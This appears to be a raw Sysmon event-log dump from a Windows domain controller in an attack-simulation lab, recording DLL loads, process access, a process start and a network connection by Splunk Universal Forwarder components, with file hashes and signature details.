Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000099478Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000099477Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099476Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 
734700x800000000000000099475Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000099474Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000099473Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000099472Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000099471Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000099470Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000099469Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, 
http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000099468Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000099467Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000099466Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000099465Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000099464Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000099463Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000099462Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 
734700x800000000000000099461Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000099460Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000099459Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000099458Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider 
InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 10341000x800000000000000099457Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099456Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000099455Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 
734700x800000000000000099454Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099453Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778trueSplunk, Inc.Valid 10341000x800000000000000099452Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:51.209{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099451Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099450Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:51.209{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099449Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099448Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:51.209{326FD73D-A252-6294-0500-000000005502}416532C:\Windows\system32\csrss.exe{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000099447Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000099446Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.210{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000099550Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:48.980{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53333-false10.0.1.12-8000- 23542300x800000000000000099549Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.365{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE585F045C04BC829EFDFA19934993D9,SHA256=37C5DC2EF25C5556F155813DD513EE3C8492032C1038B320D356B35B4150D057,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000099548Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.271{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft 
WindowsValid 734700x800000000000000099547Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.256{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000099546Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.256{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000099545Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.084{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000099544Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.084{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program 
